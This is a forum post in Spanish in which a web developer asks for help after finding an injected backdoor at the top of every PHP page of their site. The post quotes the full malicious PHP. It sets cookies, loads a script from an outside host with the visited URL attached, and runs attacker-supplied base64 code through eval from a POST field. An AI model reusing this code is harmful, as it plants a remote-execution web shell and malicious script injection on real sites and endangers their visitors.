Bueno después de años de inactividad en en elhacker.net he tenido que volver y esta vez mira como es el destino pues para hacer una pregunta de seguridad! jeje.
Bueno pues desde que deje el tema de exploit y desfaces, sniffer etc me he dedicado a programar en php, jquery y bueno todas esas cosas.
En una de las webs, la mas grande diria yo, intentando programar desde el trabajo con codeanywhere, me he dado cuenta de que tengo un backdoor
todos mis paginas.php empienzan asi:
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
Ademas tenida 8 archivos que no tenian nada que ver con mi web y que nada pues ya elimine.
Esto es como los cuernos o es la primera vez que me pasa esto, o es la primera vez que me doy cuenta. jeje
Entonces tengo varias preguntas, a ver si alguien me ayuda..
1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?
2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?
3- hay alguna manera de prevenir?
4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?
Desde ya muchas gracias a quien se tome el tiempo, sea de leer que de responder!
Un saludo!
